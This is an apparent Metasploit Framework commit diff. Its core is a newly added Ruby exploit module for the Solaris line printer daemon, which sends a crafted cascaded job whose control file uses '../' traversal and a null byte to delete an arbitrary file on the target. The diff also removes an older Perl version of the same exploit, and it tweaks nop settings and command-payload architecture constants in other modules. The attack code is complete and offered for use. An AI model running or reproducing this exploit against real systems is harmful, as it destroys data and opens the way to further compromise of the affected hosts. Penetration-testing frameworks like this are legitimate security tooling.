Miscellaneous fixes, changes to CMD payloads
git-svn-id: file:///home/svn/incoming/trunk@3296 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
09d21fbced
commit
9fc93bbe56
|
@ -51,6 +51,11 @@ module Exploit
|
||||||
# job.
|
# job.
|
||||||
#
|
#
|
||||||
def self.exploit_simple(exploit, opts)
|
def self.exploit_simple(exploit, opts)
|
||||||
|
|
||||||
|
p exploit.methods.sort
|
||||||
|
p exploit.payload?
|
||||||
|
p exploit.payload_info
|
||||||
|
|
||||||
# Make sure parameters are valid.
|
# Make sure parameters are valid.
|
||||||
if (opts['Payload'] == nil)
|
if (opts['Payload'] == nil)
|
||||||
raise MissingPayloadError,
|
raise MissingPayloadError,
|
||||||
|
|
|
@ -110,6 +110,8 @@ class EncodedPayload
|
||||||
|
|
||||||
# Get the minimum number of nops to use
|
# Get the minimum number of nops to use
|
||||||
min = (reqs['MinNops'] || 0).to_i
|
min = (reqs['MinNops'] || 0).to_i
|
||||||
|
min = 0 if reqs['DisableNops']
|
||||||
|
|
||||||
|
|
||||||
# Check to see if we have enough room for the minimum requirements
|
# Check to see if we have enough room for the minimum requirements
|
||||||
if ((reqs['Space']) and
|
if ((reqs['Space']) and
|
||||||
|
@ -164,6 +166,9 @@ class EncodedPayload
|
||||||
self.nop_sled_size = reqs['MaxNops']
|
self.nop_sled_size = reqs['MaxNops']
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Check for the DisableNops setting
|
||||||
|
self.nop_sled_size = 0 if reqs['DisableNops']
|
||||||
|
|
||||||
# Now construct the actual sled
|
# Now construct the actual sled
|
||||||
if (self.nop_sled_size > 0)
|
if (self.nop_sled_size > 0)
|
||||||
pinst.compatible_nops.each { |nopname, nopmod|
|
pinst.compatible_nops.each { |nopname, nopmod|
|
||||||
|
|
|
@ -68,23 +68,14 @@ ARCH_X86 = 'x86'
|
||||||
ARCH_MIPS = 'mips'
|
ARCH_MIPS = 'mips'
|
||||||
ARCH_PPC = 'ppc'
|
ARCH_PPC = 'ppc'
|
||||||
ARCH_SPARC = 'sparc'
|
ARCH_SPARC = 'sparc'
|
||||||
|
ARCH_CMD = 'cmd'
|
||||||
ARCH_TYPES =
|
ARCH_TYPES =
|
||||||
[
|
[
|
||||||
ARCH_X86,
|
ARCH_X86,
|
||||||
ARCH_MIPS,
|
ARCH_MIPS,
|
||||||
ARCH_PPC,
|
ARCH_PPC,
|
||||||
ARCH_SPARC
|
ARCH_SPARC,
|
||||||
|
ARCH_CMD,
|
||||||
]
|
]
|
||||||
|
|
||||||
|
ARCH_ALL = ARCH_TYPES
|
||||||
ARCH_CMD_UNIX = 'cmd_unix'
|
|
||||||
ARCH_CMD_LINUX = 'cmd_linux'
|
|
||||||
ARCH_CMD_BSD = 'cmd_bsd'
|
|
||||||
ARCH_CMD =
|
|
||||||
[
|
|
||||||
ARCH_CMD_UNIX,
|
|
||||||
ARCH_CMD_LINUX,
|
|
||||||
ARCH_CMD_BSD
|
|
||||||
]
|
|
||||||
|
|
||||||
ARCH_ALL = ARCH_TYPES + ARCH_CMD
|
|
||||||
|
|
|
@ -0,0 +1,102 @@
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
class Exploits::Solaris::Lpd::CascadeDelete < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Exploit::Remote::Tcp
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Solaris LPD Arbitrary File Delete',
|
||||||
|
'Description' => %q{
|
||||||
|
This module uses a vulnerability in the Solaris line printer
|
||||||
|
daemon to delete arbitrary files on an affected system. This
|
||||||
|
can be used to exploit the rpc.walld format string flaw, the
|
||||||
|
missing krb5.conf authentication bypass, or simply delete
|
||||||
|
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
||||||
|
|
||||||
|
},
|
||||||
|
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||||
|
],
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
['Automatic Target', { }]
|
||||||
|
],
|
||||||
|
'DisclosureDate' => '',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(515),
|
||||||
|
OptString.new('RPATH', [ true, "The remote file path to delete"]),
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
|
||||||
|
# Create a simple control file...
|
||||||
|
control = "Hmetasploit\nPr00t\n";
|
||||||
|
|
||||||
|
# The job ID is squashed down to three decimal digits
|
||||||
|
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
|
||||||
|
|
||||||
|
# Establish the first connection to the server
|
||||||
|
sock1 = connect(false)
|
||||||
|
|
||||||
|
# Request a cascaded job
|
||||||
|
sock1.put("\x02metasploit:framework\n")
|
||||||
|
res = sock1.get_once
|
||||||
|
if (not res)
|
||||||
|
print_status("The target did not accept our job request command")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# Theoretically, we could delete multiple files at once, however
|
||||||
|
# the lp daemon will append garbage from memory to the path name
|
||||||
|
# if we don't stick a null byte after the path. Unfortunately, this
|
||||||
|
# null byte will prevent the parser from processing the other paths.
|
||||||
|
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
|
||||||
|
|
||||||
|
dataf = "http://metasploit.com/\n"
|
||||||
|
|
||||||
|
print_status("Deleting #{datstore['RPATH']}...")
|
||||||
|
if (not (
|
||||||
|
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
|
||||||
|
send_file(sock1, 3, "dfa" + jid + "metasploit", dataf)
|
||||||
|
) )
|
||||||
|
sock1.close
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
|
||||||
|
sock1.close
|
||||||
|
end
|
||||||
|
|
||||||
|
def send_file (s, type, name, data='')
|
||||||
|
|
||||||
|
s.put(type.chr + data.length.to_s + " " + name + "\n")
|
||||||
|
res = s.get_once(1)
|
||||||
|
if (not (res and res[0] == 0))
|
||||||
|
print_status("The target did not accept our control file command (#{name})")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
s.put(data)
|
||||||
|
s.put("\x00")
|
||||||
|
res = s.get_once(1)
|
||||||
|
if (not (res and res[0] == 0))
|
||||||
|
print_status("The target did not accept our control file data (#{name})")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
@ -1,198 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Tcp
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
|
||||||
'Description' => %q{
|
|
||||||
This module uses a vulnerability in the Solaris line printer
|
|
||||||
daemon to delete arbitrary files on an affected system. This
|
|
||||||
can be used to exploit the rpc.walld format string flaw, the
|
|
||||||
missing krb5.conf authentication bypass, or simple delete
|
|
||||||
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[
|
|
||||||
'Automatic Targetting',
|
|
||||||
{
|
|
||||||
'Platform' => 'solaris',
|
|
||||||
'Ret' => 0x0,
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => '',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be redistributed
|
|
||||||
# according to the licenses defined in the Authors field below. In the
|
|
||||||
# case of an unknown or missing license, this file defaults to the same
|
|
||||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
|
||||||
# version of the Framework can always be obtained from metasploit.com.
|
|
||||||
##
|
|
||||||
|
|
||||||
package Msf::Exploit::solaris_lpd_unlink;
|
|
||||||
use base "Msf::Exploit";
|
|
||||||
use IO::Socket;
|
|
||||||
use IO::Select;
|
|
||||||
use strict;
|
|
||||||
use Pex::Text;
|
|
||||||
|
|
||||||
my $advanced = { };
|
|
||||||
|
|
||||||
my $info =
|
|
||||||
{
|
|
||||||
'Name' => 'Solaris LPD Arbitrary File Delete',
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Authors' =>
|
|
||||||
[
|
|
||||||
'H D Moore <hdm [at] metasploit.com>',
|
|
||||||
'Optyx <optyx [at] uberhax0r.net>'
|
|
||||||
],
|
|
||||||
|
|
||||||
'Arch' => [ ],
|
|
||||||
'OS' => [ 'solaris' ],
|
|
||||||
|
|
||||||
'UserOpts' =>
|
|
||||||
{
|
|
||||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
|
||||||
'RPORT' => [1, 'PORT', 'The LPD server port', 515],
|
|
||||||
'RPATH' => [1, 'DATA', 'The remote path name to delete'],
|
|
||||||
},
|
|
||||||
|
|
||||||
'Description' => Pex::Text::Freeform(qq{
|
|
||||||
This module uses a vulnerability in the Solaris line printer daemon
|
|
||||||
to delete arbitrary files on an affected system. This can be used to exploit
|
|
||||||
the rpc.walld format string flaw, the missing krb5.conf authentication bypass,
|
|
||||||
or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
|
|
||||||
}),
|
|
||||||
|
|
||||||
'Refs' =>
|
|
||||||
[
|
|
||||||
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
|
||||||
],
|
|
||||||
|
|
||||||
'DefaultTarget' => 0,
|
|
||||||
'Targets' => [['No Target Needed']],
|
|
||||||
|
|
||||||
'Keys' => ['lpd'],
|
|
||||||
};
|
|
||||||
|
|
||||||
sub new {
|
|
||||||
my $class = shift;
|
|
||||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
|
||||||
return($self);
|
|
||||||
}
|
|
||||||
|
|
||||||
sub Exploit {
|
|
||||||
my $self = shift;
|
|
||||||
my $target_host = $self->GetVar('RHOST');
|
|
||||||
my $target_port = $self->GetVar('RPORT');
|
|
||||||
my $target_path = $self->GetVar('RPATH');
|
|
||||||
my $res;
|
|
||||||
|
|
||||||
# We use one connection to configure the spool directory
|
|
||||||
my $s = Msf::Socket::Tcp->new
|
|
||||||
(
|
|
||||||
'PeerAddr' => $target_host,
|
|
||||||
'PeerPort' => $target_port,
|
|
||||||
'LocalPort' => $self->GetVar('CPORT'),
|
|
||||||
'SSL' => $self->GetVar('SSL'),
|
|
||||||
);
|
|
||||||
if ($s->IsError) {
|
|
||||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
# Send a job request that will trigger the cascade adaptor (thanks Dino!)
|
|
||||||
$s->Send("\x02"."metasploit:framework\n");
|
|
||||||
$res = $s->Recv(1, 5);
|
|
||||||
if (ord($res) != 0) {
|
|
||||||
$self->PrintLine("[*] The target did not accept our job request command");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
# The job ID is squashed down to three decimal digits
|
|
||||||
my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$));
|
|
||||||
|
|
||||||
# Create a simple control file...
|
|
||||||
my $control = "Hmetasploit\nPr00t\n";
|
|
||||||
|
|
||||||
# Theoretically, we could delete multiple files at once, however
|
|
||||||
# the lp daemon will append garbage from memory to the path name
|
|
||||||
# if we don't stick a null byte after the path. Unfortunately, this
|
|
||||||
# null byte will prevent the parser from processing the other paths.
|
|
||||||
$control .= "U".("../" x 10)."$target_path\x00\n";
|
|
||||||
|
|
||||||
my $dataf = "http://metasploit.com/\n";
|
|
||||||
|
|
||||||
$self->PrintLine("[*] Sending the malicious cascaded job request...");
|
|
||||||
if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) ||
|
|
||||||
! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf) ||
|
|
||||||
0
|
|
||||||
) { $s->Close; return }
|
|
||||||
|
|
||||||
$self->PrintLine('');
|
|
||||||
$self->PrintLine("[*] Successfully deleted $target_path >:-]");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
sub SendFile {
|
|
||||||
my $self = shift;
|
|
||||||
my $sock = shift;
|
|
||||||
my $type = shift;
|
|
||||||
my $name = shift;
|
|
||||||
my $data = shift;
|
|
||||||
|
|
||||||
$sock->Send(chr($type) .length($data). " $name\n");
|
|
||||||
my $res = $sock->Recv(1, 5);
|
|
||||||
if (ord($res) != 0) {
|
|
||||||
$self->PrintLine("[*] The target did not accept our control file command ($name)");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
$sock->Send($data);
|
|
||||||
$sock->Send("\x00");
|
|
||||||
$res = $sock->Recv(1, 5);
|
|
||||||
if (ord($res) != 0) {
|
|
||||||
$self->PrintLine("[*] The target did not accept our control file data ($name)");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
$self->PrintLine(sprintf("[*] Uploaded %.4d bytes >> $name", length($data)));
|
|
||||||
return 1;
|
|
||||||
}
|
|
||||||
|
|
||||||
1;
|
|
||||||
|
|
||||||
=end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -23,14 +23,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
|
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Platform' => 'unix',
|
'Platform' => ['unix', 'solaris'],
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => ARCH_CMD,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 2000,
|
'Space' => 2000,
|
||||||
'BadChars' => "",
|
'BadChars' => '',
|
||||||
'MinNops' => 0,
|
'DisableNops' => true,
|
||||||
'MaxNops' => 0,
|
|
||||||
},
|
},
|
||||||
'PayloadCompat' =>
|
'PayloadCompat' =>
|
||||||
{
|
{
|
||||||
|
|
|
@ -45,9 +45,7 @@ class Exploits::Windows::Http::Icecast_Header_Overflow < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'Space' => 2000,
|
'Space' => 2000,
|
||||||
'BadChars' => "\x0d\x0a\x00",
|
'BadChars' => "\x0d\x0a\x00",
|
||||||
'MinNops' => 0,
|
'DisableNops' => true,
|
||||||
'MaxNops' => 0,
|
|
||||||
|
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
|
|
Loading…
Reference in New Issue